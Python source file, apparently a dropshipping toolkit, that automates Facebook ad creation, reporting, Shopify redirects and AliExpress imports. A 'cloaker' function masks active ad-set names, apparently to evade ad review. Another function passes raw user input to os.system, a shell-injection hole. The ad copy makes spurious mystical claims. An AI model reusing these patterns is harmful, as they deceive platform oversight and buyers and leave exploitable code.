chromejs("x = document.getElementsByTagName('div');y = [];z = x.length;for (i=0;i<z;i++) {a=x[i]; if (a.getAttribute('data-testid')=='FixedDataTableRow') {y=y.concat(a);}};b = y.length; for (i=0;i<b;i++) {a = y[i];c = a.getElementsByClassName('_4h2m');console.log(c.length);d = c[0]; d.style.width = '40px'; d.style.left = '0px';d = c[1]; d.style.width = '40px'; d.style.left = '40px';d = c[2]; d.style.width = '160px'; d.style.left = '80px';d = c[3]; d.style.width = '100px'; d.style.left = '0px';d = c[4]; d.style.width = '100px'; d.style.left = '100px';d = c[5]; d.style.width = '100px'; d.style.left = '200px';d = c[6]; d.style.width = '100px'; d.style.left = '300px';d = c[7]; d.style.width = '100px'; d.style.left = '400px';d = c[8]; d.style.width = '100px'; d.style.left = '500px';d = c[9]; d.style.width = '100px'; d.style.left = '600px';d = c[10]; d.style.width = '100px'; d.style.left = '700px';d = c[11]; d.style.width = '100px'; d.style.left = '800px';d = c[12]; d.style.width = '100px'; d.style.left = '900px';d = c[13]; d.style.width = '100px'; d.style.left = '1000px';d = c[14]; d.style.width = '100px'; d.style.left = '1100px';d = c[15]; d.style.width = '100px'; d.style.left = '1200px';d = c[16]; d.style.width = '100px'; d.style.left = '1300px';d = c[17]; d.style.width = '100px'; d.style.left = '1400px';e = a.getElementsByClassName('_3pzk');f = e[1]; f.style.width = '241px'; f.style.left = '241px';}; x = document.getElementsByClassName('_1mic')[0]; y = x.getElementsByClassName('_4h2m'); z = y[0]; z.style.width = '40px'; z.style.left = '0px'; z = y[1]; z.style.width = '40px'; z.style.left = '40px'; z = y[2]; z.style.width = '160px'; z.style.left = '80px'; z = y[3]; z.style.width = '100px'; z.style.left = '0px'; z = y[4]; z.style.width = '100px'; z.style.left = '100px'; z = y[5]; z.style.width = '100px'; z.style.left = '200px'; z = y[6]; z.style.width = '100px'; z.style.left = '300px'; z = y[7]; z.style.width = '100px'; z.style.left = '400px'; z = y[8]; z.style.width = '100px'; z.style.left = '500px'; z = y[9]; z.style.width = '100px'; z.style.left = '600px'; z = y[10]; z.style.width = '100px'; z.style.left = '700px'; z = y[11]; z.style.width = '100px'; z.style.left = '800px'; z = y[12]; z.style.width = '100px'; z.style.left = '900px'; z = y[13]; z.style.width = '100px'; z.style.left = '1000px'; z = y[14]; z.style.width = '100px'; z.style.left = '1100px'; z = y[15]; z.style.width = '100px'; z.style.left = '1200px'; z = y[16]; z.style.width = '100px'; z.style.left = '1300px'; z = y[17]; z.style.width = '100px'; z.style.left = '1400px'; e = x.getElementsByClassName('_3pzk'); f = e[1]; f.style.width = '241px'; f.style.left = '241px'; x = document.getElementsByClassName('_1mme')[0]; y = x.getElementsByClassName('_1eyi'); z = y[0]; z.style.width = '40px'; z.style.left = '0px'; z = y[1]; z.style.width = '40px'; z.style.left = '40px'; z = y[2]; z.style.width = '160px'; z.style.left = '80px'; z = y[3]; z.style.width = '100px'; z.style.left = '0px'; z = y[4]; z.style.width = '100px'; z.style.left = '100px'; z = y[5]; z.style.width = '100px'; z.style.left = '200px'; z = y[6]; z.style.width = '100px'; z.style.left = '300px'; z = y[7]; z.style.width = '100px'; z.style.left = '400px'; z = y[8]; z.style.width = '100px'; z.style.left = '500px'; z = y[9]; z.style.width = '100px'; z.style.left = '600px'; z = y[10]; z.style.width = '100px'; z.style.left = '700px'; z = y[11]; z.style.width = '100px'; z.style.left = '800px'; z = y[12]; z.style.width = '100px'; z.style.left = '900px'; z = y[13]; z.style.width = '100px'; z.style.left = '1000px'; z = y[14]; z.style.width = '100px'; z.style.left = '1100px'; z = y[15]; z.style.width = '100px'; z.style.left = '1200px'; z = y[16]; z.style.width = '100px'; z.style.left = '1300px'; z = y[17]; z.style.width = '100px'; z.style.left = '1400px'; e = x.getElementsByClassName('_182x'); f = e[1]; f.style.left = '241px'; x = document.getElementsByClassName('_1mme')[0]; y = x.getElementsByClassName('_4h2m'); z = y[0]; z.style.width = '40px'; z = y[1]; z.style.width = '40px'; z = y[2]; z.style.width = '160px'; z = y[3]; z.style.width = '100px'; z = y[4]; z.style.width = '100px'; z = y[5]; z.style.width = '100px'; z = y[6]; z.style.width = '100px'; z = y[7]; z.style.width = '100px'; z = y[8]; z.style.width = '100px'; z = y[9]; z.style.width = '100px'; z = y[10]; z.style.width = '100px'; z = y[11]; z.style.width = '100px'; z = y[12]; z.style.width = '100px'; z = y[13]; z.style.width = '100px'; z = y[14]; z.style.width = '100px'; z = y[15]; z.style.width = '100px'; z = y[16]; z.style.width = '100px'; z.style.left = '1300px'; z = y[17]; z.style.width = '100px'; z.style.left = '1400px'; e = x.getElementsByClassName('_3pzk'); f = e[1]; f.style.width = '241px'; f.style.left = '241px';")
time.sleep(0.2)
def adsFeed(self, date_range=100, bd=True, filters=None):
print("FEEDING ADSETS")
self.ff = Browser()("sele", window_index=[0,0,4,4])
url = format_url(self, date_range, bd, filters)
self.ff.get(url)
self.ff.fcss('._2a2d').click(); zz(6)
try: adms = CSV().DictRead(time_a_download(method=self.ff.ffs('button','action','confirm').click))
except: adms = CSV().DictRead(time_a_download(method=self.ff.fcn('layerConfirm').click))
print('adms: %s'%adms)
if 'No data available' in str(adms):
print("no adsets")
return []
adms = [i for i in adms if i['Ad Set ID'] != '' and i['Ad Set Name'] != None and 'DPA' not in i['Ad Set Name']]
for adm in adms:
for a in adm:
if adm[a] == '' or adm[a] == None:
adm[a] = 0
# adm['data'] = eval(adm['Ad Set Name'])
adm['spent'] = float(adm['Amount Spent (USD)'])
adm['pcv'] = float(adm['Website Purchases Conversion Value'])
adm['pcs'] = float(adm['Website Purchases'])
adm['cpc'] = float(adm['CPC (Cost per Link Click) (USD)'])
adm['clicks'] = float(adm['Link Clicks'])
adm['roi'] = float(adm['pcv']) / float(adm['spent']) if adm['spent'] != 0 else 0
"""
print("...feedAudience...")
for x in Audience.objects.all():
x.pcs = 0
x.roi = 0
x.spent = 0.01
x.pcv = 0
matching_audiences = [i for i in adms if i['data']['audname'] == x.name]
x.pcs += sum(key(matching_audiences, 'pcs'))
x.spent += sum(key(matching_audiences, 'spent'))
x.pcv += sum(key(matching_audiences, 'pcv'))
x.roi += x.pcv / x.spent
x.save()
print("...feedProduct...")
for x in Product.objects.all():
x.pcs = 0
x.roi = 0
x.spent = 0.01
x.pcv = 0
x.pcs = sum([i['pcs'] for i in adms if i['data']['handle'] == x.handle])
x.spent += sum([i['spent'] for i in adms if i['data']['handle'] == x.handle])
x.pcv = sum([i['pcv'] for i in adms if i['data']['handle'] == x.handle])
x.roi = x.pcv / x.spent
print(x.pcs, x.spent, x.pcv, x.roi)
x.save()
"""
self.adms = adms
self.ff.quit()
return self.adms
def advertise():
storeabbre = input("what store abbre?: ")
shop = Shop()( storeabbre)
BASE_ADSET_DICTIONARY = {'Ad ID': '','Ad Name': 'test','Ad Set Daily Budget': '5','Ad Set ID': '','Ad Set Lifetime Budget': '0','Ad Set Lifetime Impressions': '0','Ad Set Name': 'test','Ad Set Run Status': 'ACTIVE','Ad Set Schedule': '','Ad Set Time Start': '%s 2:00:00 am' % Date().dt(1, '%m/%d/%Y'),'Ad Set Time Stop': '','Ad Status': 'ACTIVE','Add End Card': '','Additional Custom Tracking Specs': '[]','Addresses': '','Age Max': '65','Age Min': '18','Android App Name': '','Android Package Name': '','App Destination': '','Application ID': '','Attribution Spec': '[{"event_type":"CLICK_THROUGH","window_days":7},{"event_type":"VIEW_THROUGH","window_days":1}]','Audience Network Positions': 'classic','Automatically Set Bid': 'Yes','Behaviors': '','Bid Amount': '','Billing Event': 'IMPRESSIONS','Body': '','Broad Category Clusters': '','Buying Type': 'AUCTION','Call to Action': '','Call to Action Link': '','Campaign ID': '','Campaign KPI': '','Campaign KPI Custom Conversion ID': '','Campaign Name': 'test','Campaign Objective': 'Conversions','Campaign Page ID': '','Campaign Spend Limit': '','Campaign Status': 'ACTIVE','Cities': '','College End Year': '','College Start Year': '','Connections': '','Conversion Tracking Pixels': 'tp:141019342913259','Countries': 'US','Creative Optimization': '','Creative Type': 'Photo Page Post Ad','Custom Audiences': '','Deep Link For Android': '','Deep Link For Windows Phone': '','Deep Link For iOS': '','Deep Link For iPad': '','Deep Link For iPhone': '','Deep link to website': '','Destination Type': 'UNDEFINED','Device Platforms': 'mobile, desktop','Display Link': '','Dynamic Ad Voice': '','Education Schools': '','Education Status': '','Electoral Districts': '','Event ID': '','Excluded Addresses': '','Excluded Cities': '','Excluded Connections': '','Excluded Countries': '','Excluded Custom Audiences': '','Excluded Electoral Districts': '','Excluded Geo Markets (DMA)': '','Excluded Global Regions': '','Excluded Product Audience Specs': '','Excluded Publisher Categories': '','Excluded Regions': '','Excluded User AdClusters': '','Excluded User Device': '','Excluded Zip': '','Facebook App ID': '','Facebook Positions': 'feed, right_hand_column','Family Statuses': '','Fields of Study': '','Flexible Exclusions': '','Flexible Inclusions': '[{"interests":[{"id":"6003324061606","name":"Audrey Hepburn"},{"id":"6003347600674","name":"Katharine Hepburn"},{"id":"6003392991271","name":"Rockabilly"},{"id":"6011957502962","name":"www.rockabilly-clothing.de"},{"id":"6013806088087","name":"Viva Las Vegas Rockabilly Weekend"}]}]','Force Single Link': '','Frequency Control': '','Friends of Connections': '','Gender': '','Generation': '','Geo Markets (DMA)': '','Global Regions': '','Home Ownership': '','Home Type': '','Home Value': '','Household Composition': '','Image': '83824348246.jpg','Image Crops': '','Image Hash': '','Image Overlay Float With Margin': '','Image Overlay Position': '','Image Overlay Template': '','Image Overlay Text Font': '','Image Overlay Text Type': '','Image Overlay Theme Color': '','Income': '','Industries': '','Instagram Account ID': '','Instagram Platform Image Crops': '','Instagram Platform Image Hash': '','Instagram Platform Image URL': '','Instagram Positions': '','Instagram Preview Link': '','Interested In': '','Lead Form ID': '','Life Events': '','Link': 'https://www.facebook.com/steampunkstop/photos/p.1998717263718262/1998717263718262/?type=3','Link Description': 'Auxiliary. We’ve Scourged Hotspots Of The Earth Mercilessly With Grandiose Detectors And Finally Our SteamBots Have Enchanted The Auxiliary Dress With Magnetic Seals To Affix Protection Spirits To It Permanently.\nClick Below 👇\nsteampunkstop.com/auxiliary','Link Object ID': 'o:1669573053299353','Locales': '','Location Types': 'home, recent','Messenger Positions': '','Mobile App Deep Link': '','Moms': '','Multicultural Affinity': '','Net Worth': '','Object Store URL': '','Offer ID': '','Office Type': '','Optimization Goal': 'OFFSITE_CONVERSIONS','Optimized Conversion Tracking Pixels': 'tp:141019342913259','Optimized Custom Conversion ID': '','Optimized Event': 'PURCHASE','Optimized Pixel Rule': '','Page Welcome Message': '','Permalink': 'https://business.facebook.com/1669573053299353/posts/1998717263718262?business_id=560484760766872','Place Page Set ID': '','Politics': '','Post Click Item Description': '','Post Click Item Headline': '','Preview Link': 'https://www.facebook.com/?feed_demo_ad=6095601486324&h=AQDKS_Ci6KEDEOCa','Product 1 - Description': '','Product 1 - Display Link': '','Product 1 - Image Crops': '','Product 1 - Image Hash': '','Product 1 - Is Static Card': '','Product 1 - Link': '','Product 1 - Mobile App Deep Link': '','Product 1 - Name': '','Product 1 - Place Data': '','Product 1 - Video ID': '','Product 10 - Description': '','Product 10 - Display Link': '','Product 10 - Image Crops': '','Product 10 - Image Hash': '','Product 10 - Is Static Card': '','Product 10 - Link': '','Product 10 - Mobile App Deep Link': '','Product 10 - Name': '','Product 10 - Place Data': '','Product 10 - Video ID': '','Product 2 - Description': '','Product 2 - Display Link': '','Product 2 - Image Crops': '','Product 2 - Image Hash': '','Product 2 - Is Static Card': '','Product 2 - Link': '','Product 2 - Mobile App Deep Link': '','Product 2 - Name': '','Product 2 - Place Data': '','Product 2 - Video ID': '','Product 3 - Description': '','Product 3 - Display Link': '','Product 3 - Image Crops': '','Product 3 - Image Hash': '','Product 3 - Is Static Card': '','Product 3 - Link': '','Product 3 - Mobile App Deep Link': '','Product 3 - Name': '','Product 3 - Place Data': '','Product 3 - Video ID': '','Product 4 - Description': '','Product 4 - Display Link': '','Product 4 - Image Crops': '','Product 4 - Image Hash': '','Product 4 - Is Static Card': '','Product 4 - Link': '','Product 4 - Mobile App Deep Link': '','Product 4 - Name': '','Product 4 - Place Data': '','Product 4 - Video ID': '','Product 5 - Description': '','Product 5 - Display Link': '','Product 5 - Image Crops': '','Product 5 - Image Hash': '','Product 5 - Is Static Card': '','Product 5 - Link': '','Product 5 - Mobile App Deep Link': '','Product 5 - Name': '','Product 5 - Place Data': '','Product 5 - Video ID': '','Product 6 - Description': '','Product 6 - Display Link': '','Product 6 - Image Crops': '','Product 6 - Image Hash': '','Product 6 - Is Static Card': '','Product 6 - Link': '','Product 6 - Mobile App Deep Link': '','Product 6 - Name': '','Product 6 - Place Data': '','Product 6 - Video ID': '','Product 7 - Description': '','Product 7 - Display Link': '','Product 7 - Image Crops': '','Product 7 - Image Hash': '','Product 7 - Is Static Card': '','Product 7 - Link': '','Product 7 - Mobile App Deep Link': '','Product 7 - Name': '','Product 7 - Place Data': '','Product 7 - Video ID': '','Product 8 - Description': '','Product 8 - Display Link': '','Product 8 - Image Crops': '','Product 8 - Image Hash': '','Product 8 - Is Static Card': '','Product 8 - Link': '','Product 8 - Mobile App Deep Link': '','Product 8 - Name': '','Product 8 - Place Data': '','Product 8 - Video ID': '','Product 9 - Description': '','Product 9 - Display Link': '','Product 9 - Image Crops': '','Product 9 - Image Hash': '','Product 9 - Is Static Card': '','Product 9 - Link': '','Product 9 - Mobile App Deep Link': '','Product 9 - Name': '','Product 9 - Place Data': '','Product 9 - Video ID': '','Product Audience Specs': '','Product Catalog ID': '','Product Link': '','Product Set ID': '','Publisher Platforms': 'facebook, audience_network','Rate Card': '','Regions': '','Relationship': '','Retailer IDs': '','Site Category': '','Story ID': '','Tags': '','Targeted Business Locations': '','Targeting Categories - ALL OF': '','Targeting Optimization': '','Template URL': '','Title': '','URL Tags': '','Unified Interests': '','Use Accelerated Delivery': 'No','Use Average Bid': 'No','Use Page as Actor': 'No','User Device': '','User OS Version': '','User Operating System': '','Video ID': '','Video Retargeting': 'No','Video Thumbnail URL': '','Windows App Name': '','Windows Store ID': '','Wireless Carrier': '','Work Employers': '','Work Job Titles': '','Zip': '','iOS App Name': '','iOS App Store ID': '','iPad App Name': '','iPad App Store ID': '','iPhone App Name': '','iPhone App Store ID': ''}
DICTIONARYS_FOR_CSV = []
products_csv=os.path.expanduser('~/tavern/tavern/products.csv')
PRODUCTS_ROWS_DICTIONARYS = CSV().DictRead(products_csv)
products = productsFeed(shop)
FULL_EXTENSION_FILENAMES = []
for ROW in PRODUCTS_ROWS_DICTIONARYS:
if ROW["advertise?"] == "TRUE":
p = [i for i in products if i["title"] == ROW["title"]][-1]
p = shop.shopify.Product.find(id_=p['id'])
caption = create_caption(p, shop, ROW['caption'], ROW["shopify_url"])
NEW_DATA = copy.deepcopy(BASE_ADSET_DICTIONARY)
NEW_DATA["Flexible Inclusions"] = ""
NEW_DATA['Campaign Name'] = p.handle
NEW_DATA['Ad Set Name'] = caption.replace("\n", " ")
NEW_DATA['Ad Name'] = NEW_DATA['Ad Set Name']
NEW_DATA['Display Link'] = caption
NEW_DATA['Title'] = caption
NEW_DATA['Body'] = caption
NEW_DATA['Post Click Item Headline'] = caption
NEW_DATA['Description'] = caption
try:
variant_id = int(ROW["shopify_url"].split("variant=")[-1])
print("variant id: %s" )
############ FINDING MATCHING IMAGE FROM PRODUCT IMAGES BASED ON VARIANT ID
img_id = None
for i in p.variants:
if i.id == variant_id:
img_id = i.image_id
print("Found matching img_id to URL %s" % url)
variant_src = None
for i in p.images:
if i.id == img_id:
variant_src = i.src
print("Found matching variant_id to img_id.. %s" % variant_src)
fn = None
if variant_src is not None:
fn = Images().download_and_resize(variant_src, 1200)
if img_id is None: # this is in the case its a "1 Title Product"
fn = Images().download_and_resize(p.image.src, 1200)
print("image filename for the variant: %s" % fn)
FULL_EXTENSION_FILENAMES.append(fn)
NEW_DATA['Image'] = fn.split('/')[-1]
pprint(NEW_DATA)
DICTIONARYS_FOR_CSV.append(NEW_DATA)
except Exception as e:
print("error with possibly probably - the product has 0 variants and thus variantless URL, error:\n%s"% e )
tmp_file = os.path.expanduser("~/tmp.csv")
CSV().DictWrite(tmp_file, DICTIONARYS_FOR_CSV)
ss = Browser()("sele")
if not Get(Shop,shop_abbreviation=Muta()().store_abbre).Facebook_Business_Manager_ID:
Update(Get(Shop,shop_abbreviation=Muta()().store_abbre),Facebook_Business_Manager_ID=OSA.log("Enter in the Facebook Business Manager ID. You can usually find it in the url like business_id=<Business ID>."))
ss.get("https://business.facebook.com/ads/manage/powereditor/manage/campaigns?act={}&business_id={}&columns=start_time%2Ccampaign_group_name%2Cname%2Ccampaign_id%2Cimpressions%2Cfrequency%2Ccpm%2Cclicks%2Cctr%2Cactions%3Alink_click%2Ccost_per_action_type%3Alink_click%2Cspend%2Caction_values%3Aoffsite_conversion.fb_pixel_purchase%2Cactions%3Aoffsite_conversion.fb_pixel_purchase%2Ccost_per_action_type%3Aoffsite_conversion.fb_pixel_purchase%2Cactions%3Aoffsite_conversion.checkout%2Ccost_per_action_type%3Aoffsite_conversion.checkout%2Cbudget%2Crelevance_score%3Ascore%2Cwebsite_purchase_roas%3Aoffsite_conversion.fb_pixel_purchase&attribution_windows=default&date=2005-02-01_2017-12-31%2Clifetime".format(Get(Shop,shop_abbreviation=Muta()().store_abbre).Facebook_Business_Ad_Account_ID, Get(Shop,shop_abbreviation=Muta()().store_abbre).Facebook_Business_Manager_ID))
#""" # OLD WITH FIREFOX
try:
ss.ffs('button','data-tooltip-content','Create & Edit in a Spreadsheet').click()
except:
ss.ffs('button','data-tooltip-content','Export & import').click()
ss.ffss('li','role','presentation')[-2].click()
ss.ffs('input','data-testid','import-paste-text-link').send_keys(tmp_file)
IMAGE_UPLOAD_BUTTON = ss.ffs('input','accept','image/jpg, image/jpeg, image/gif, image/bmp, image/png, image/tiff, image/tif')
for x in FULL_EXTENSION_FILENAMES:
IMAGE_UPLOAD_BUTTON.send_keys(x)
ss.ffs('button','data-testid','import-button').click()
#"""
while True:
if "Your import is complete" in ss.page_source:
time.sleep(3)
break
ss.quit()
# advertise(url, p, caption)
def alter_redirect(shop_abbreviation, previous_path, new_path, new_target):
redirects = get_redirects(Shop()(shop_abbreviation))
redirect = [i for i in redirects if i.path == previous_path][0]
redirect.path = new_path
redirect.target = new_target
assert True == redirect.save()
assert requests.get("%s%s"%(Shop()(shop_abbreviation).Domain_Name,new_path)).url==new_target
def caption_tee():
caption_to_tee = multi_input("caption to tee: ")
os.system("echo '============================\n%s\n\n============================' | tee -a ./.teed_captions.txt" % caption_to_tee)
def check_remaining():
page_name = OSA.log("Page name?")
OSA.log("%s"%(len(get_scheduled_posts(page_name))))
def cloaker(io=None, direction=None):
""" ::: Initiate Shop ::: """
a_shop()
""" ::: If you use July_Adset_Utilities to update all adset targeting data, to ::: """
""" ::: Get the most accurate adset effective_status data, it's the same as ::: """
""" ::: requesting all adset_ids in database, checking if active status, (to change adset name)::: """
""" ::: So here I update adset targeting data ///actually at direction==1.\\\::: """
if direction == 0:
import builtins
if type(io) == builtins.dict:
for adset_id,adset_name in io.items():
AdSet(adset_id).remote_update(params={"name":adset_name})
magentaprint(AdSet(adset_id).remote_read(fields=["name"])._json)
elif direction == 1:
July_Adset_Utilities().update_adset_targeting_data()
dict = {}
for adset in Filter(Adset,status="ACTIVE"):
name = None
try:
name = AdSet(adset.adset_id).remote_read(fields=["name"])._json["name"]
except Exception as e:
redprint(e)
continue
redprint(adset.adset_id, name)
dict[adset.adset_id] = name
AdSet(adset.adset_id).remote_update(params={"name":"0000"})
return dict
def createCreative(shop, fn, fb_page_id, caption):
image = AdImage(parent_id='act_%s'%shop.Facebook_Business_Ad_Account_ID)
image[AdImage.Field.filename] = fn
image.remote_create()
# Output image Hash
print("hash: %s" % image[AdImage.Field.hash])
photo_data = AdCreativePhotoData()
photo_data['image_hash'] = image['hash']
photo_data['caption'] = caption
object_story_spec = AdCreativeObjectStorySpec()
object_story_spec[AdCreativeObjectStorySpec.Field.page_id] = fb_page_id
object_story_spec[AdCreativeObjectStorySpec.Field.photo_data] = photo_data
creative = AdCreative(parent_id='act_%s'%shop.Facebook_Business_Ad_Account_ID)
creative[AdCreative.Field.name] = 'AdCreative %s' % random.randrange(0, 10**10)
creative[AdCreative.Field.object_story_spec] = object_story_spec
creative.remote_create()
print(creative)
return creative
def create_ad(product=None,variant_id=None,store_abbre=None,niche=None,page=None,caption=None):
short_url = create_redirect(Shop()(Muta()().store_abbre), path=("/%s"%(get_handle_from_title(product.title))), target=("%s/products/%s%s"%(Shop()(Muta()().store_abbre).Domain_Name,get_handle_from_title(product.title),("?variant=%s"%(or_list(variant_id,product.variants[0].id)) ))))
# OSA.log("C")
caption = caption.replace("<redirect_url>",short_url)
# OSA.log("D")
url = None
if variant_id == None:
url = product.images[0].src
else:
# OSA.log("%s %s"%(variant_id,type(product)))
# variant = [i for i in product.variants if i.id == variant_id][0]
# variant_image_id = variant.image_id
# image = [i for i in product.images if i.id == variant_image_id][0]
# image_src = image.src
# if image_src == None:
# # 1
# image_src = product.images[0].src
image_src = or_list(lambda:[j.src for j in product.images if j.id == [i for i in product.variants if i.id == variant_id][0]],lambda:product.images[0].src)
url = image_src
campaign_id, adset_id = AdsetCreater()(fbid=Shop()(Muta()().store_abbre).Facebook_Business_Ad_Account_ID,url=url,caption=caption,page_id=[i for i in get_pages() if i["name"] == Muta()().page][0]["id"],interest_ids=[])
# OSA.log("E")
Save(Adset, campaign_id=campaign_id, adset_id=adset_id, ad_account_id=Shop()(Muta()().store_abbre).Facebook_Business_Ad_Account_ID, is_created=True, handle=product.handle, niche=Muta()().niche, shop_abbreviation=Muta()().store_abbre, facebook_page=Muta()().page, product_url=short_url, image_url=product.images[0].src, caption=caption, interest_ids=[])
# OSA.log("F")
Update(product,adset_id=adset_id)
# OSA.log("G")
# OSA.log(str(adset_id))
July_Adset_Utilities().update_advertisement_all(adset_id)
# OSA.log("H")
pool(lambda:OSA().log("adset created",tp=False))
def create_redirect(shop, path, target):
path = path.lower().strip()
target = target.lower().strip()
redirect = shop.shopify.Redirect()
# redirects = sum([shop.shopify.Redirect.find(status="any", limit=250, page=i) for i in range(1,10)],[])
redirects = shop.shopify.Redirect.find(path=path)
if path in key("path", redirects):
x = [i for i in redirects if i.path == path]
redirect = x[0]
print("changing existing redirect of %s to %s"% (redirect.target, target))
redirect.path = path
redirect.target = target
if not redirect.target.startswith("https://"): redirect.target = "https://%s"%redirect.target
# [3/28/19] https:// required
assert True == redirect.save()
distinct_print("%s -----> %s" % (redirect.path, redirect.target))
x = (shop.Domain_Name + redirect.path).replace("https://","").replace("http://","")
return x
def export_a_video():
shop, handle = OSA.log("Please enter the shop abbreviation and handle, separated by ', ', [for example: xyz, wall-decal]").split(", ")
export_address = OSA.log("Please enter the address to export the video to [for example: /Users/user/video.mp4]")
product = Get(Product,shop=shop,handle=handle)
video = Get(Video,product_id = product.id)
open(export_address,"wb").write(video.video)
def format_url(self, date_range, bd, filters):
dates = '&date=%s_%s' % (Date().dt(date_range*-1), Date().dt(0))
day_bd_url = 'https://business.facebook.com/ads/manager/account/adsets/?act='+self.Facebook_Business_Ad_Account_ID+dates+'&time_breakdown=days_1&columns=["start_time"%2C"campaign_group_name"%2C"name"%2C"campaign_id"%2C"impressions"%2C"frequency"%2C"cpm"%2C"clicks"%2C"ctr"%2C"actions%3Alink_click"%2C"cost_per_action_type%3Alink_click"%2C"spend"%2C"action_values%3Aoffsite_conversion.fb_pixel_purchase"%2C"actions%3Aoffsite_conversion.fb_pixel_purchase"%2C"cost_per_action_type%3Aoffsite_conversion.fb_pixel_purchase"%2C"actions%3Aoffsite_conversion.checkout"%2C"cost_per_action_type%3Aoffsite_conversion.checkout"%2C"budget"%2C"relevance_score%3Ascore"]&sort=cost_per_action_type%3Aoffsite_conversion.fb_pixel_purchase~1|delivery_info~1|spent~0|start_time~0&pid=p1'
if bd==False:
day_bd_url = day_bd_url.replace('&time_breakdown=days_1', '')
if filters == 'paused':
day_bd_url += '&filter_set=[{%22field%22%3A%22campaign.delivery_info%22%2C%22operator%22%3A%22IN%22%2C%22value%22%3A[%22inactive%22]}]'
if filters == 'active':
day_bd_url += '&filter_set=[{%22field%22%3A%22campaign.delivery_info%22%2C%22operator%22%3A%22IN%22%2C%22value%22%3A[%22active%22%2C%22limited%22]}]'
return day_bd_url
def gen_adset_name(niche,audname,handle,budget) :
return str(OrderedDict([('niche',niche), ('audname',audname), ('handle',handle),
('budget',budget) ]))
def get_next_scheduled_time(page,scheduled_posts):
times_to_schedule = page.publish_times
max_scheduled_time = or_list(lambda:max(sud("scheduled_publish_time",scheduled_posts)),lambda:Date()().replace(hour=times_to_schedule[-1]))
max_scheduled_time_hour = max_scheduled_time.hour
max_scheduled_time_date = max_scheduled_time
max_scheduled_time_second = max_scheduled_time.second
latest = times_to_schedule[-1]
next_scheduled_time_hour = None
next_scheduled_time_date = None
if max_scheduled_time_hour == latest:
next_scheduled_time_hour = times_to_schedule[0]
else:
index = times_to_schedule.index(max_scheduled_time_hour)
next_index = index + 1
next_scheduled_time_hour = times_to_schedule[next_index]
if max_scheduled_time_hour == latest:
next_scheduled_time_date = (Date(max_scheduled_time_date)+1)()
else:
next_scheduled_time_date = Date(max_scheduled_time_date)()
next_scheduled_time = next_scheduled_time_date.replace(hour=next_scheduled_time_hour,second=max_scheduled_time_second)
next_scheduled_time_timestamp = int(timestamp(next_scheduled_time))
return next_scheduled_time_timestamp
def get_next_scheduled_times(page,publish_times,start_date,count):
all_data = []
page = Get(Facebookpage,name=page)
start_idx = 0
for i in range(count):
new = start_date.replace(hour=publish_times[start_idx])
start_idx = start_idx + 1
if start_idx+1 > len(publish_times):
start_idx = 0
start_date = start_date + timedelta(days=1)
all_data.append(new)
return all_data
def get_pages():
Shop()(All(Shop)[0].shop_abbreviation) # set the api
user = get_user()
pages = keycall("export_all_data", user.get_accounts(params={"limit":5000}))
[tryprocess(Facebookpage(facebook_id=i["id"],name=i["name"],url="https://facebook.com/%s"%i["id"]).save,) for i in pages]
[Update(Get(Facebookpage,facebook_id=i["id"]),token=i["access_token"]) for i in pages]
[Update(Get(Facebookpage,facebook_id=i["id"]),publish_times = [14,19]) for i in pages]
[Del(i) for i in All(Facebookpage) if i.name not in sud("name",pages)]
return pages
def get_post_reactions(page_name, post_id):
page = Get(Facebookpage, name = page_name)
url = "https://graph.facebook.com/%s/reactions"%(post_id)
token = page.token
params = {"access_token":token, "fields":["total_count"],"summary":"total_count"}
r = requests.get(url, params = params)
data = json.loads(r.text)
total_count = data["summary"]["total_count"]
return total_count
def get_posted_posts(page_name):
page = Get(Facebookpage, name = page_name)
facebook_id = page.facebook_id
url = "https://graph.facebook.com/%s/feed"%(facebook_id)
token = page.token
params = {"access_token":token, "fields":["created_time","message","id"], "limit":100}
r = requests.get(url, params = params)
all_data = []
data = json.loads(r.text)["data"]
all_data.extend(data)
response = json.loads(r.text)
while "next" in response.get("paging",[]):
next_url = response["paging"]["next"]
r = requests.get(next_url)
response = json.loads(r.text)
data = json.loads(r.text)["data"]
all_data.extend(data)
return all_data
def get_promoted_object():
promoted_object = { "custom_event_type": "PURCHASE", "pixel_id": str(Shop()(adset_to_create.shop_abbreviation).Facebook_Pixel_ID), "pixel_rule": "{\"event\":{\"eq\":\"Purchase\"}}" }
return promoted_object
def get_redirect_from_ad_copy(ad_copy):
return re.findall(r"[:/a-zA-Z0-9]+\.[/a-zA-Z0-9-]+",body)
def get_redirects(shop):
redirects = sum([shop.shopify.Redirect.find(status="any", limit=250, page=i) for i in range(1,10)],[])
return redirects
def get_scheduled_posts(page_name):
page = Get(Facebookpage, name = page_name)
facebook_id = page.facebook_id
url = "https://graph.facebook.com/%s/scheduled_posts"%(facebook_id)
token = page.token
params = {"access_token":token, "fields":["scheduled_publish_time"], "limit":100}
r = requests.get(url, params = params)
all_data = []
data = json.loads(r.text)["data"]
all_data.extend(data)
response = json.loads(r.text)
while "next" in response.get("paging",[]):
next_url = response["paging"]["next"]
r = requests.get(next_url)
response = json.loads(r.text)
data = json.loads(r.text)["data"]
all_data.extend(data)
[setitem(i,"scheduled_publish_time",timestamp(i["scheduled_publish_time"],False)) for i in all_data]
return all_data
def get_url_from_body(x):
return getitem(re.findall(".*/.*",x),0,"None").split(" ")[-1]
def get_user():
a_shop()
from facebookads.adobjects.user import User
api = FacebookAdsApi.init(app_id=a_shop().Facebook_Business_App_ID,app_secret=a_shop().Facebook_Business_App_Secret,access_token=a_shop().Facebook_Business_App_Token)
return User(fbid="me", api=api)
def print_sorted_audiences():
auds = Audience.objects.all()
auds = keysort('pcs', auds, tcer=True)
CSV().csvprint(auds, colnames=['pcs','roi','spent','pcv', 'name', 'niche', 'id'])
def print_targeting_data(data):
print("Targeting DATA for adset:\n\
1. Age Min: %s\n\
2. Age Max: %s\n\
3. Gender: %s\n\
4. Pixel Goals: %s\n\
5. Attribution Spec: %s\n\
6. Device Platforms: %s\n\
7. Publisher Platforms: %s\n\
8. Targeting Optimization: %s\n"%(data['targeting']['age_min'], data['targeting']['age_max'],
data['targeting']['genders'], data['promoted_object']['custom_event_type'],
data['attribution_spec'][0]['window_days'], data['targeting']['device_platforms'],
data['targeting']['publisher_platforms'], data['targeting']['targeting_optimization']))
def run():
products_csv=os.path.expanduser('~/tavern/tavern/products.csv')
data = CSV().DictRead(products_csv)
shop = Shop()(All(Shop)[0].shop_abbreviation)
# dicts = []
for i in data:
if i['added'] == "FAILED":
products = productsFeed(shop)
for j in products:
if j.title == i['title']:
j.delete()
if i['added'] == 'FALSE':
p = Aliexpress_Products().create_product(i['url'].split('?')[0], i['niche'], i['item_type'], i['title'], i['description'])
input("Adjust Images, State / Add to Body - ")
